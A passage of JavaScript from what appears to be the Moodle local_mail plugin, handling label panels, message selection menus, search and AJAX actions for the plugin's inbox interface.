var posx = position[0]+(Y.one('body').get('offsetWidth')/2)-width; mail_edit_label_panel = new Y.Panel({ srcNode : '#local_mail_form_edit_label', headerContent: title, width : width, zIndex : 5, centered : false, modal : true, visible : false, render : true, xy : [posx,position[1]], plugins : [Y.Plugin.Drag] }); mail_edit_label_panel.addButton({ value : M.util.get_string('submit', 'moodle'), section: Y.WidgetStdMod.FOOTER, action : function (e) { e.preventDefault(); mail_edit_label_panel.hide(); mail_doaction('setlabel'); } }); mail_edit_label_panel.addButton({ value : M.util.get_string('cancel', 'moodle'), section: Y.WidgetStdMod.FOOTER, action : function (e) { e.preventDefault(); mail_edit_label_panel.hide(); } }); }; var mail_create_new_label_panel = function () { var title = M.util.get_string('newlabel', 'local_mail'); var obj = (Y.one('.mail_list')?Y.one('.mail_list'):Y.one('.mail_view')); var position = obj.getXY(); var width = 400; var posx = position[0]+(Y.one('body').get('offsetWidth')/2)-width; mail_new_label_panel = new Y.Panel({ srcNode : '#local_mail_form_new_label', headerContent: title, width : width, zIndex : 5, centered : true, modal : true, visible : false, render : true, xy : [posx,position[1]], plugins : [Y.Plugin.Drag] }); mail_new_label_panel.addButton({ value : M.util.get_string('submit', 'moodle'), section: Y.WidgetStdMod.FOOTER, action : function (e) { e.preventDefault(); mail_new_label_panel.hide(); mail_doaction('newlabel'); } }); mail_new_label_panel.addButton({ value : M.util.get_string('cancel', 'moodle'), section: Y.WidgetStdMod.FOOTER, action : function (e) { e.preventDefault(); mail_new_label_panel.hide(); } }); }; var mail_hide_actions = function() { Y.all('.mail_menu_actions li').each(function(node){ node.hide(); }); mail_show_label_actions(false); }; var mail_show_label_actions = function(separator) { if (mail_view_type == 'label' && !mail_message_view) { if (separator) { Y.one('.mail_menu_action_separator').ancestor('li').show(); } Y.one('.mail_menu_action_editlabel').ancestor('li').show(); Y.one('.mail_menu_action_removelabel').ancestor('li').show(); } }; var mail_update_menu_actions = function() { var separator = false; mail_hide_actions(); if (mail_message_view) { if (mail_view_type == 'trash') { Y.one('.mail_menu_action_markasunread').ancestor('li').show(); } else { Y.one('.mail_menu_action_markasunread').ancestor('li').show(); if (Y.one('.mail_flags span').hasClass('mail_starred')) { Y.one('.mail_menu_action_markasunstarred').ancestor('li').show(); } else { Y.one('.mail_menu_action_markasstarred').ancestor('li').show(); } } } else { if (Y.all('.mail_selected.mail_unread').size()) { Y.one('.mail_menu_action_markasread').ancestor('li').show(); separator = true; } if (Y.all('.mail_selected.mail_unread').size() < Y.all('.mail_selected').size()) { Y.one('.mail_menu_action_markasunread').ancestor('li').show(); separator = true; } if (Y.all('.mail_selected span.mail_starred').size()) { Y.one('.mail_menu_action_markasunstarred').ancestor('li').show(); separator = true; } if (Y.all('.mail_selected span.mail_unstarred').size()) { Y.one('.mail_menu_action_markasstarred').ancestor('li').show(); separator = true; } } mail_show_label_actions(separator); }; var mail_toggle_menu = function() { var button = Y.one('.mail_checkbox_all'); var menu = Y.one('.mail_optselect'); var position = button.getXY(); if (!button.hasClass('mail_button_disabled')) { position[1] += button.get('clientHeight') + 2; menu.toggleClass('mail_hidden'); menu.setXY(position); } }; var mail_hide_menu_options = function() { Y.one('.mail_optselect').addClass('mail_hidden'); }; var mail_hide_menu_actions = function() { Y.one('.mail_actselect').addClass('mail_hidden'); }; var mail_hide_menu_labels = function() { if (mail_view_type != 'trash') { Y.one('.mail_labelselect').addClass('mail_hidden'); } }; var mail_hide_menu_search = function() { var menu = Y.one('#mail_menu_search'); if (menu) { menu.addClass('mail_hidden'); } if (M.form.dateselector.panel) { M.form.dateselector.panel.hide(); } }; var mail_toggle_menu_actions = function() { var button = Y.one('.mail_more_actions'); var menu = Y.one('.mail_actselect'); var position = button.getXY(); if (!button.hasClass('mail_button_disabled')) { position[1] += button.get('clientHeight') + 2; menu.toggleClass('mail_hidden'); menu.setXY(position); } }; var mail_toggle_menu_labels = function() { var button = Y.one('.mail_assignlbl'); var menu = Y.one('.mail_labelselect'); var position = button.getXY(); if (!button.hasClass('mail_button_disabled')) { position[1] += button.get('clientHeight') + 2; menu.toggleClass('mail_hidden'); menu.setXY(position); } }; var mail_toggle_menu_search = function() { var button = Y.one('#mail_search'); var menu = Y.one('#mail_menu_search'); var advsearch = Y.one('#mail_adv_search'); var position = button.getXY(); var date; position[1] += button.get('clientHeight') + 2; menu.toggleClass('mail_hidden'); menu.setXY(position); if (!menu.hasClass('mail_hidden')) { Y.one('#textsearch').focus(); if (!advsearch.hasClass('mail_hidden')) { mail_position_datepicker(); } if (mail_doing_search) { Y.one('#buttoncancelsearch').removeClass('mail_hidden'); } else { Y.one('#buttoncancelsearch').addClass('mail_hidden'); } } else { M.form.dateselector.panel.hide(); } }; var mail_toggle_adv_search = function() { var menu = Y.one('#mail_adv_search'); var status = Y.one('#mail_adv_status'); menu.toggleClass('mail_hidden'); if (menu.hasClass('mail_hidden')) { M.form.dateselector.panel.hide(); status.set('src', M.util.image_url('t/collapsed', 'moodle')); status.set('alt', 'collapsed'); } else { mail_position_datepicker(); status.set('src', M.util.image_url('t/expanded', 'moodle')); status.set('alt' ,'expanded'); } }; var mail_do_search = function() { mail_doing_search = true; mail_perpageid = 0; mail_search_selected = Y.one('#textsearch').get('value'); mail_searchfrom_selected = Y.one('#textsearchfrom').get('value'); mail_searchto_selected = Y.one('#textsearchto').get('value'); mail_unread_selected = Y.one('#searchunread').get('checked'); mail_attach_selected = Y.one('#searchattach').get('checked'); mail_select_none(); mail_check_selected(); Y.all('.mail_paging input').set('disabled', 'disabled'); mail_show_loading_image(); mail_doaction('search'); mail_hide_menu_search(); }; var mail_show_loading_image = function() { Y.one('.mail_list').addClass('mail_hidden'); Y.one('.mail_search_loading').removeClass('mail_hidden'); }; var mail_update_form_search = function() { Y.one('#textsearch').set('value', mail_search_selected); Y.one('#textsearchfrom').set('value', mail_searchfrom_selected); Y.one('#textsearchto').set('value', mail_searchto_selected); if (mail_unread_selected) { Y.one('#searchunread').set('checked', 'checked'); } if (mail_attach_selected) { Y.one('#searchattach').set('checked', 'checked'); } }; var mail_remove_action = function(action) { Y.one(action).ancestor('li').remove(); }; var mail_customize_menu_actions = function(checkbox) { var menu = Y.one('.mail_menu_actions'); var mailitem = checkbox.ancestor('.mail_item'); var separator = false; var nodes; if (mail_is_checkbox_checked(checkbox)) { //Read or unread if (mailitem.hasClass('mail_unread')) { menu.one('a.mail_menu_action_markasread').ancestor('li').show(); separator = true; } else { menu.one('a.mail_menu_action_markasunread').ancestor('li').show(); separator = true; } //Starred or unstarred if (mail_view_type != 'trash' && mailitem.one('.mail_flags span').hasClass('mail_starred')) { menu.one('a.mail_menu_action_markasunstarred').ancestor('li').show(); separator = true; } else { if (mail_view_type != 'trash') { menu.one('a.mail_menu_action_markasstarred').ancestor('li').show(); separator = true; } } } else { if (!Y.all('.mail_list .mail_selected').size()) { mail_hide_actions(); } else { //Read or unread if (mailitem.hasClass('mail_unread')) { if (!mailitem.siblings('.mail_selected.mail_unread').size()) { menu.one('a.mail_menu_action_markasread').ancestor('li').hide(); } } else { if (mailitem.siblings('.mail_selected.mail_unread').size() == mailitem.siblings('.mail_selected').size()) { menu.one('a.mail_menu_action_markasunread').ancestor('li').hide(); } } //Starred or unstarred if (mail_view_type != 'trash' && mailitem.one('.mail_flags a span').hasClass('mail_starred')) { nodes = mailitem.siblings(function(obj) { return obj.hasClass('mail_selected') && obj.one('.mail_flags a span.mail_starred'); }); if (!nodes.size()) { menu.one('a.mail_menu_action_markasunstarred').ancestor('li').hide(); } } else { nodes = mailitem.siblings(function(obj) { return obj.hasClass('mail_selected') && obj.one('.mail_flags a span.mail_unstarred'); }); if (mail_view_type != 'trash' && !nodes.size()) { menu.one('a.mail_menu_action_markasstarred').ancestor('li').hide(); } } } } mail_show_label_actions(separator); }; var mail_label_default_values = function () { var grouplabels; if (Y.one('.mail_labelselect').hasClass('mail_hidden')) { Y.each(M.local_mail.mail_labels, function (label, index) { mail_checkbox_labels_default[index] = 0; }); if (mail_message_view) { grouplabels = Y.all('.mail_group_labels span'); if (grouplabels) { mail_set_label_default_values(grouplabels); } } else { var nodes = mail_get_checkboxs_checked(); Y.each(nodes, function (node, index) { grouplabels = node.ancestor('.mail_item').all('.mail_group_labels span'); if (grouplabels) { mail_set_label_default_values(grouplabels); } }); } mail_label_set_values(); } }; var mail_set_label_default_values = function (grouplabels) { var classnames = []; var num; Y.each(grouplabels, function (grouplabel, index) { classnames = grouplabel.getAttribute('class').split(' '); Y.each(classnames, function(classname){ num = /mail_label_(\d+)/.exec(classname); if (num) { mail_checkbox_labels_default[num[1]] += 1; } }); }); if (mail_view_type == 'label') { num = parseInt(Y.one('input[name="itemid"]').get('value'), 10); mail_checkbox_labels_default[num] += 1; } }; var mail_menu_label_selection = function (node) { var checkbox = node.one('.mail_adv_checkbox'); if (checkbox) { mail_toggle_checkbox(checkbox); } }; var mail_customize_menu_label = function() { if (Y.all('.mail_menu_labels li').size() > 1) { if(mail_label_check_default_values()) { Y.one('.mail_menu_labels .mail_menu_label_newlabel').removeClass('mail_hidden'); Y.one('.mail_menu_labels .mail_menu_label_apply').addClass('mail_hidden'); } else { Y.one('.mail_menu_labels .mail_menu_label_newlabel').addClass('mail_hidden'); Y.one('.mail_menu_labels .mail_menu_label_apply').removeClass('mail_hidden'); } } }; var mail_label_check_default_values = function () { var isdefault = true; var classname; var labelid; var num; var labels = Y.all('.mail_menu_labels .mail_adv_checkbox'); if (!mail_message_view) { var total = mail_get_checkboxs_checked().size(); Y.each(labels, function(label, index) { classname = label.getAttribute('class'); num = /mail_label_value_(\d+)/.exec(classname); if (num) { labelid = num[1]; if (mail_checkbox_labels_default[labelid] == total) { isdefault = isdefault && label.hasClass('mail_checkbox1'); } else if(mail_checkbox_labels_default[labelid] > 0) { isdefault = isdefault && label.hasClass('mail_checkbox2'); } else { isdefault = isdefault && label.hasClass('mail_checkbox0'); } } }); } else { Y.each(labels, function(label, index) { classname = label.getAttribute('class'); num = /mail_label_value_(\d+)/.exec(classname); if (num) { labelid = num[1]; if (mail_checkbox_labels_default[labelid] == 1) { isdefault = isdefault && label.hasClass('mail_checkbox1'); } else { isdefault = isdefault && label.hasClass('mail_checkbox0'); } } }); } return isdefault; }; var mail_label_set_values = function () { var total = (mail_message_view?1:mail_get_checkboxs_checked().size()); var state; Y.each(mail_checkbox_labels_default, function(value, index){ if (value == total) { state = 1; } else if(value > 0) { state = 2; } else { state = 0; } mail_set_checkbox(Y.one('.mail_menu_labels .mail_label_value_'+index), state); }); }; var mail_get_label_value = function(checkbox){ var value; classnames = checkbox.getAttribute('class').split(' '); Y.each(classnames, function(classname){ num = /mail_label_value_(\d+)/.exec(classname); if (num) { value = num[1]; } }); return value; }; var mail_get_labels_checked = function(){ return Y.all('.mail_menu_labels .mail_checkbox1'); }; var mail_get_labels_thirdstate = function(){ return Y.all('.mail_menu_labels .mail_checkbox2'); }; var mail_get_labels_values = function(thirdstate){ var nodes = (thirdstate?mail_get_labels_thirdstate():mail_get_labels_checked()); var values = []; Y.each(nodes, function (node, index) { values.push(mail_get_label_value(node)); }); return values.join(); }; var mail_assign_labels = function (node) { node = (typeof node !== 'undefined' ? node : false); var grouplabels; var elem; var labelid = 0; if (mail_message_view) { grouplabels = Y.one('.mail_group_labels'); } else { grouplabels = node.ancestor('.mail_item').one('.mail_group_labels'); } if (mail_view_type == 'label') { labelid = parseInt(Y.one('input[name="itemid"]').get('value'), 10); } var lblstoadd = mail_get_labels_values(false).split(','); var lblstoremain = mail_get_labels_values(true).split(','); Y.each(M.local_mail.mail_labels, function (value, index) { if (Y.Array.indexOf(lblstoadd, index) != -1) { if (index != labelid) { elem = grouplabels.one('.mail_label_'+index); if (!elem) { elem = Y.Node.create('<span class="mail_label mail_label_'+M.local_mail.mail_labels[index].color+' mail_label_'+index+'">'+M.local_mail.mail_labels[index].name+'</span>'); grouplabels.append(elem); } } } else if (Y.Array.indexOf(lblstoremain, index) == -1) { if (!mail_message_view && index == labelid) { grouplabels.ancestor('.mail_item').remove(); } else { elem = grouplabels.one('.mail_label_'+index); if (elem) { elem.remove(); } } } }); }; var mail_check_selected = function() { mail_enable_all_buttons(Y.all('.mail_selected').size()); }; var mail_enable_button = function(button, bool) { bool = (typeof bool !== 'undefined' ? bool : false); if (bool) { button.removeClass('mail_button_disabled'); } else if(!button.hasClass('mail_checkbox_all')){ button.addClass('mail_button_disabled'); } }; var mail_enable_all_buttons = function(bool) { var mail_buttons = Y.all('.mail_toolbar .mail_buttons .mail_button'); Y.each(mail_buttons, (function(button) { button.removeClass('mail_hidden'); mail_enable_button(button, bool); })); if (Y.one('#mail_search')) { mail_enable_button(Y.one('#mail_search'), true); } if (Y.one('#buttonsearch')) { mail_enable_button(Y.one('#buttonsearch'), true); } if (Y.one('#buttoncancelsearch')) { mail_enable_button(Y.one('#buttoncancelsearch'), true); } if (mail_view_type == 'label') { mail_enable_button(Y.one('.mail_toolbar .mail_more_actions'), true); } }; var mail_get_checkboxs_checked = function(){ return Y.all('.mail_list .mail_checkbox1'); }; var mail_get_checkbox_value = function(checkbox){ var value; classnames = checkbox.getAttribute('class').split(' '); Y.each(classnames, function(classname){ num = /mail_checkbox_value_(\d+)/.exec(classname); if (num) { value = num[1]; } }); return value; }; var mail_get_checkboxs_values = function(){ var nodes = mail_get_checkboxs_checked(); var values = []; Y.each(nodes, function (node, index) { values.push(mail_get_checkbox_value(node)); }); return values.join(); }; var mail_set_checkbox = function(node, value){ if (value == 1) { node.removeClass('mail_checkbox0').removeClass('mail_checkbox2').addClass('mail_checkbox1'); } else if (value == 2) { node.removeClass('mail_checkbox0').removeClass('mail_checkbox1').addClass('mail_checkbox2'); } else { node.removeClass('mail_checkbox1').removeClass('mail_checkbox2').addClass('mail_checkbox0'); } }; var mail_toggle_checkbox = function(node){ if (node.hasClass('mail_checkbox0')) { mail_set_checkbox(node, 1); } else { mail_set_checkbox(node, 0); } }; var mail_is_checkbox_checked = function(node){ return node.hasClass('mail_checkbox1'); }; var mail_main_checkbox = function(){ if(!Y.all('.mail_selected').size()) { mail_set_checkbox(Y.one('.mail_checkbox_all > .mail_adv_checkbox'), 0); } else if(Y.all('.mail_selected').size() == Y.all('.mail_item').size()) { mail_set_checkbox(Y.one('.mail_checkbox_all > .mail_adv_checkbox'), 1); } else { mail_set_checkbox(Y.one('.mail_checkbox_all > .mail_adv_checkbox'), 2); } mail_check_selected(); }; var mail_select_all = function(){ var checkbox = Y.one('.mail_checkbox_all > .mail_adv_checkbox'); mail_set_checkbox(checkbox, 1); var nodes = Y.all('.mail_list .mail_adv_checkbox'); nodes.each(function(node) { mail_set_checkbox(node, 1); node.ancestor('.mail_item').addClass('mail_selected'); }); }; var mail_select_none = function(){ var checkbox = Y.one('.mail_checkbox_all > .mail_adv_checkbox'); mail_set_checkbox(checkbox, 0); var nodes = Y.all('.mail_list .mail_adv_checkbox'); nodes.each(function(node) { mail_set_checkbox(node, 0); node.ancestor('.mail_item').removeClass('mail_selected'); }); }; var mail_select_read = function(){ var nodes = Y.all('.mail_item > .mail_adv_checkbox'); var ancestor; if (nodes) { nodes.each(function(node) { ancestor = node.ancestor('.mail_item'); if (!ancestor.hasClass('mail_unread')){ mail_set_checkbox(node, 1); ancestor.addClass('mail_selected'); } else { mail_set_checkbox(node, 0); ancestor.removeClass('mail_selected'); } }); } }; var mail_select_unread = function() { var nodes = Y.all('.mail_item > .mail_adv_checkbox'); var ancestor; if (nodes) { nodes.each(function(node) { ancestor = node.ancestor('.mail_item'); if (ancestor.hasClass('mail_unread')){ mail_set_checkbox(node, 1); ancestor.addClass('mail_selected'); } else { mail_set_checkbox(node, 0); ancestor.removeClass('mail_selected'); } }); } }; var mail_select_starred = function() { var nodes = Y.all('.mail_item > .mail_adv_checkbox'); var ancestor; if (nodes) { nodes.each(function(node) { ancestor = node.ancestor('.mail_item'); if (ancestor.one('.mail_starred')) { mail_set_checkbox(node, 1); ancestor.addClass('mail_selected'); } else { mail_set_checkbox(node, 0); ancestor.removeClass('mail_selected'); } }); } }; var mail_select_unstarred = function() { var nodes = Y.all('.mail_item > .mail_adv_checkbox'); var ancestor; if (nodes) { nodes.each(function(node) { ancestor = node.ancestor('.mail_item'); if (ancestor.one('.mail_unstarred')) { mail_set_checkbox(node, 1); ancestor.addClass('mail_selected'); } else { mail_set_checkbox(node, 0); ancestor.removeClass('mail_selected'); } }); } }; //Success call var handleSuccess = function (transactionid, response, args) { var obj = Y.JSON.parse(response.responseText); var img; var node; if (obj.msgerror) { alert(obj.msgerror); } else { if (obj.html) { Y.one('#local_mail_main_form').setContent(obj.html); init(); mail_update_url(); } if (obj.search) { mail_perpageid = obj.search.perpageid; mail_doing_search = true; Y.one('#mail_search').addClass('mail_button_searching'); Y.one('.mail_paging input[name="prevpage"]').set('disabled', 'disabled'); Y.one('.mail_paging input[name="nextpage"]').set('disabled', 'disabled'); Y.one('.mail_paging > span').addClass('mail_hidden'); mail_search_selected = obj.search.query; mail_searchfrom_selected = obj.search.searchfrom; mail_searchto_selected = obj.search.searchto; mail_unread_selected = obj.search.unread; mail_attach_selected = obj.search.attach; mail_date_selected = obj.search.date; mail_update_form_search(); if (obj.search.prev) { Y.one('.mail_paging input[name="prevpage"]').set('disabled', ''); } if (obj.search.next) { Y.one('.mail_paging input[name="nextpage"]').set('disabled', ''); } if (!mail_message_view) { mail_before_message_search = obj.search.idbefore; mail_after_message_search = obj.search.idafter; } } if (obj.info) { if (obj.info.root) { node = Y.one('.mail_root span'); if (node) { node.setContent(obj.info.root); } node = Y.one('.mail_root'); if (node) { if(obj.info.root.match(/\(\d+\)/)) { node.addClass('local_mail_new_messages'); } else { node.removeClass('local_mail_new_messages'); } } } if (obj.info.inbox) { node = Y.one('.mail_inbox a img'); if (node) { img = node.get('outerHTML'); node = Y.one('.mail_inbox a'); if (node) { node.setContent(img+obj.info.inbox); } } } if (obj.info.drafts) { node = Y.one('.mail_drafts a img'); if (node) { img = node.get('outerHTML'); node = Y.one('.mail_drafts a'); if (node) { node.setContent(img+obj.info.drafts); } } } if (obj.info.courses) { Y.each(obj.info.courses, (function(value, index) { node = Y.one('.mail_course_'+index+' a img'); if (node) { img = node.get('outerHTML'); node = Y.one('.mail_course_'+index+' a'); if (node) { Y.one('.mail_course_'+index+' a').setContent(img+value); } } })); } if (obj.info.labels) { Y.each(obj.info.labels, (function(value, index) { node = Y.one('.mail_label_'+index+' a img'); if (node) { img = node.get('outerHTML'); node = Y.one('.mail_label_'+index+' a'); if (node) { node.setContent(img+value); } } })); } } //Undo last action if (obj.undo && mail_undo_function != 'undo') { var msg = M.util.get_string('undo'+mail_undo_function, 'local_mail', obj.undo.split(',').length); if (mail_undo_function == 'delete') { mail_undo_function = 'restore'; } else if (mail_undo_function == 'restore') { mail_undo_function = 'delete'; } mail_notification_message(msg); mail_undo_ids = obj.undo; } else { mail_undo_function = ''; } if(obj.redirect) { document.location.href = obj.redirect; } } }; //Failure call var handleFailure = function (transactionid, response, args) { console.log(response); }; //Update screen data and async call var mail_doaction = function(action, node) { node = (typeof node !== 'undefined' ? node : null); var nodes = mail_get_checkboxs_checked(); var obj; var child; var ancestor; var ids; var request; var mail_view; if(mail_message_view) { if(action == 'togglestarred') { obj = node.one('span'); if (obj.hasClass('mail_starred')) { action = 'unstarred'; obj.replaceClass('mail_starred', 'mail_unstarred'); node.set('title', M.util.get_string('unstarred','local_mail')); } else { action = 'starred'; obj.replaceClass('mail_unstarred', 'mail_starred'); node.set('title', M.util.get_string('starred','local_mail')); } } else if (action == 'delete' || action == 'restore') { mail_undo_function = action; mail_message_view = false; } else if (action == 'starred') { node = Y.one('.mail_flags span'); node.replaceClass('mail_unstarred', 'mail_starred'); node.ancestor('a').set('title', M.util.get_string('starred','local_mail')); } else if (action == 'unstarred') { node = Y.one('.mail_flags span'); node.replaceClass('mail_starred', 'mail_unstarred'); node.ancestor('a').set('title', M.util.get_string('unstarred','local_mail')); } else if(action == 'markasunread') { mail_message_view = false; } else if(action == 'goback') { mail_message_view = false; } else if(action == 'assignlabels') { mail_assign_labels(); } mail_view = true; ids = Y.one('input[name="m"]').get('value'); } else {//List messages view if(action == 'viewmail') { nodes.empty(); var url = node.get('href'); if (url.match(/compose\.php/)){ document.location.href = url; return 0; } else { ids = /m=(\d+)/.exec(node.get('href'))[1]; } } else if (action == 'delete') { mail_undo_function = action; ids = mail_get_checkboxs_values(); } else if (action == 'restore') { mail_undo_function = action; ids = mail_get_checkboxs_values(); } else if (action == 'discard') { ids = mail_get_checkboxs_values(); } else if (action == 'undo') { nodes.empty(); action = mail_undo_function; mail_undo_function = 'undo'; ids = mail_undo_ids; } else if (action == 'togglestarred') { obj = node.ancestor('.mail_item').one('.mail_adv_checkbox'); nodes = Y.all(obj); if (node.one('span').hasClass('mail_starred')) { action = 'unstarred'; } else { action = 'starred'; } ids = mail_get_checkbox_value(obj); } else if(action == 'perpage' || action == 'search'){ nodes.empty(); } else { ids = mail_get_checkboxs_values(); } if (nodes.size()) { nodes.each(function (node) { ancestor = node.ancestor('.mail_item'); if (action == 'starred') { child = ancestor.one('.mail_unstarred'); if(child) { child.replaceClass('mail_unstarred', 'mail_starred'); child.ancestor('a').set('title', M.util.get_string('starred','local_mail')); } } else if(action == 'unstarred') { if (mail_view_type == 'starred') { ancestor.remove(); } else { child = ancestor.one('.mail_starred'); if(child) { child.replaceClass('mail_starred', 'mail_unstarred'); child.ancestor('a').set('title', M.util.get_string('unstarred','local_mail')); } } } else if(action == 'markasread') { ancestor.removeClass('mail_unread'); } else if(action == 'markasunread') { ancestor.addClass('mail_unread'); } else if(action == 'delete' || action == 'restore' || action == 'discard') { ancestor.remove(); } else if(action == 'assignlabels') { mail_assign_labels(node); } }); } mail_view = false; } //Ajax call var cfg = { method: 'POST', data: { msgs: ids, sesskey: Y.one('input[name="sesskey"]').get('value'), type: mail_view_type, offset: Y.one('input[name="offset"]').get('value'), action: action, mailview: mail_view }, on: { success:handleSuccess, failure:handleFailure } }; if (Y.one('input[name="m"]')) { cfg.data.m = Y.one('input[name="m"]').get('value'); } if(Y.one('input[name="itemid"]')) { cfg.data.itemid = Y.one('input[name="itemid"]').get('value'); } if (action == 'perpage') { cfg.data.perpage = (node.get('innerText')?node.get('innerText'):node.get('textContent')); } if (action == 'assignlabels') { cfg.data.labelids = mail_get_labels_values(false); cfg.data.labeltsids = mail_get_labels_values(true); } if (action == 'setlabel') { obj = Y.one('#local_mail_edit_label_color'); cfg.data.labelname = Y.one('#local_mail_edit_label_name').get('value'); if (!cfg.data.labelname) { alert(M.util.get_string('erroremptylabelname', 'local_mail')); mail_label_edit(); return false; } else if (cfg.data.labelname.length > 100) { alert(M.util.get_string('maximumchars', 'moodle', 100)); mail_label_edit(); return false; } cfg.data.labelcolor = obj.get('value'); } if (action == 'newlabel') { obj = Y.one('#local_mail_new_label_color'); cfg.data.labelname = Y.one('#local_mail_new_label_name').get('value'); if (!cfg.data.labelname) { alert(M.util.get_string('erroremptylabelname', 'local_mail')); mail_label_new(); return false; } else if (cfg.data.labelname.length > 100) { alert(M.util.get_string('maximumchars', 'moodle', 100)); mail_label_new(); return false; } cfg.data.labelcolor = obj.get('value'); } if (action == 'nextpage' || action == 'prevpage' ) { obj = Y.one('#mail_loading_small'); var btn = Y.one('.mail_paging input[name="'+action+'"]'); var position = btn.getXY(); obj.removeClass('mail_hidden'); position[0] += (btn.get('offsetWidth')/2) - (obj.one('img').get('offsetWidth')/2); position[1] = btn.getXY()[1] + (obj.one('img').get('offsetHeight')/2); obj.setXY(position); } if (mail_doing_search) { //Go back when searching keeps current page if (action == 'goback') { if (mail_before_message_search) { cfg.data.before = mail_before_message_search; } else if (mail_after_message_search) { cfg.data.after = mail_after_message_search; } } cfg.data.search = mail_search_selected; cfg.data.searchfrom = mail_searchfrom_selected; cfg.data.searchto = mail_searchto_selected; cfg.data.unread = (mail_unread_selected?'1':''); cfg.data.attach = (mail_attach_selected?'1':''); cfg.data.time = mail_date_selected; cfg.data.perpageid = mail_perpageid; if (action == 'prevpage') { obj = Y.one('.mail_list .mail_item .mail_adv_checkbox'); if (obj) { cfg.data.after = mail_get_checkbox_value(obj); } cfg.data.action = 'search'; } else if (action == 'nextpage') { obj = Y.all('.mail_item:last-child .mail_adv_checkbox'); if (obj) { cfg.data.before = mail_get_checkbox_value(obj.shift()); cfg.data.perpageid = cfg.data.before; } cfg.data.action = 'search'; } cfg.data.searching = true; } if (mail_undo_function == 'undo') { cfg.data.undo = true; } request = Y.io(M.cfg.wwwroot + '/local/mail/ajax.php', cfg); }; var mail_label_confirm_delete = function(e) { var labelid; var message; var labelname = ''; labelid = Y.one('input[name="itemid"]').get('value'); labelname = M.local_mail.mail_labels[labelid].name; if (labelname.length > 25) { labelname = labelname.substring(0, 25) + '...'; } message = M.util.get_string('labeldeleteconfirm', 'local_mail', labelname); M.util.show_confirm_dialog(e, { 'callback' : mail_label_remove, 'message' : message, 'continuelabel': M.util.get_string('delete', 'local_mail') } ); }; var mail_label_remove = function() { var params = []; params.push('offset='+Y.one('input[name="offset"]').get('value')); params.push('sesskey='+Y.one('input[name="sesskey"]').get('value')); params.push('removelbl=1'); params.push('confirmlbl=1'); var url = Y.one('#local_mail_main_form').get('action'); document.location.href = url+'&'+params.join('&'); }; var mail_label_new = function() { mail_new_label_panel.show(); Y.one('#local_mail_form_new_label').removeClass('mail_hidden'); Y.one('#local_mail_new_label_name').focus(); }; var mail_label_edit = function() { var labelid = Y.one('input[name="itemid"]').get('value'); var labelname = M.local_mail.mail_labels[labelid].name; var labelcolor = M.local_mail.mail_labels[labelid].color; Y.one('#local_mail_edit_label_name').set('value', labelname); Y.all('.mail_label_color').removeClass('mail_label_color_selected'); if (!labelcolor) { Y.one('.mail_label_color.mail_label_nocolor').addClass('mail_label_color_selected'); labelcolor = ''; } else { Y.one('.mail_label_color.mail_label_' + labelcolor).addClass('mail_label_color_selected'); } Y.one('#local_mail_edit_label_color').set('value', labelcolor); mail_edit_label_panel.show(); Y.one('#local_mail_form_edit_label').removeClass('mail_hidden'); Y.one('#local_mail_edit_label_name').focus(); }; var mail_label_set_selected = function(obj, action) { Y.all('.mail_label_color').removeClass('mail_label_color_selected'); obj.addClass('mail_label_color_selected'); Y.one('#local_mail_' + action + '_label_color').set('value', obj.getAttribute('data-color')); }; var mail_update_url = function() { var params = []; var offset; var m; var type; if (history.pushState) { params.push('t='+mail_view_type); if (mail_message_view) { params.push('m='+Y.one('input[name="m"]').get('value')); } if (mail_view_type == 'course') { params.push('c='+Y.one('input[name="itemid"]').get('value')); } else { if (mail_view_type == 'label') { params.push('l='+Y.one('input[name="itemid"]').get('value')); } } offset = Y.one('input[name="offset"]').get('value'); if (parseInt(offset, 10) > 0) { params.push('offset='+offset); } history.pushState({}, document.title, M.cfg.wwwroot + '/local/mail/view.php?' + params.join('&')); } }; var mail_position_datepicker = function() { var menu = Y.one('#mail_menu_search'); var datepicker = Y.one('#dateselector-calendar-panel'); var search = Y.one('.mail_search_datepicker'); var position = menu.getXY(); position[0] += (menu.get('offsetWidth')/2) - (datepicker.get('offsetWidth')/2); position[1] = search.getXY()[1] - datepicker.get('offsetHeight'); datepicker.setXY(position); }; var mail_get_selected_date = function(cell, date) { mail_date_selected = cell.date.getFullYear() + ',' + cell.date.getMonth() + ',' + cell.date.getDate(); mail_set_selected_date(mail_date_selected); M.form.dateselector.panel.hide(); }; var mail_set_selected_date = function(date) { if (date) { var elems = date.split(','); date = Y.Date.format(new Date(elems[0], elems[1], elems[2]), {format:"%x"}) } else { date = Y.Date.format(new Date(), {format:"%x"}) } Y.one('#searchdate').set('text', date); }; var mail_notification_message = function(message) { if (message) { Y.one('#mail_notification').addClass('mail_enabled').removeClass('mail_novisible'); Y.one('#mail_notification_message').setContent(message); Y.one('#mail_notification_undo').removeClass('mail_novisible'); } else { Y.one('#mail_notification').removeClass('mail_enabled').addClass('mail_novisible'); Y.one('#mail_notification_message').setContent(''); Y.one('#mail_notification_undo').addClass('mail_novisible'); } }; var mail_reset_date_selected = function() { date = new Date(); mail_date_selected = date.getFullYear() + ',' + date.getMonth() + ',' + date.getDate(); M.form.dateselector.calendar.deselectDates(date); }; /*** Event listeners***/ //Background selection Y.one("#region-main").delegate('click', function(e) { var ancestor = this.ancestor('.mail_item'); mail_toggle_checkbox(this); ancestor.toggleClass('mail_selected'); mail_main_checkbox(); mail_customize_menu_actions(this); }, '.mail_list .mail_adv_checkbox'); //Select all/none Y.one("#region-main").delegate('click', function(e) { e.stopPropagation(); mail_toggle_checkbox(this); mail_hide_menu_options(); mail_hide_menu_labels(); if (mail_is_checkbox_checked(this)) { mail_select_all(); } else { mail_select_none(); } mail_check_selected(); mail_update_menu_actions(); }, '.mail_checkbox_all > .mail_adv_checkbox'); //Toggle menu select all/none Y.one("#region-main").delegate('click', function(e) { e.stopPropagation(); mail_toggle_menu(); mail_hide_menu_actions(); mail_hide_menu_labels(); mail_hide_menu_search(); }, '.mail_checkbox_all'); //Checkbox hides other menus Y.one("#region-main").delegate('click', function(e) { mail_hide_menu_options(); mail_hide_menu_labels(); }, '.mail_checkbox_all > .mail_adv_checkbox'); //Toggle menu actions Y.one("#region-main").delegate('click', function(e) { e.stopPropagation(); mail_toggle_menu_actions(); mail_hide_menu_options(); mail_hide_menu_labels(); mail_hide_menu_search(); }, '.mail_more_actions'); //Toggle menu actions Y.one("#region-main").delegate('click', function(e) { e.stopPropagation(); mail_label_default_values(); mail_customize_menu_label(); mail_toggle_menu_labels(); mail_hide_menu_options(); mail_hide_menu_actions(); mail_hide_menu_search(); }, '.mail_assignlbl'); //Menu select all Y.one("#region-main").delegate('click', function(e) { e.preventDefault(); mail_toggle_menu(); 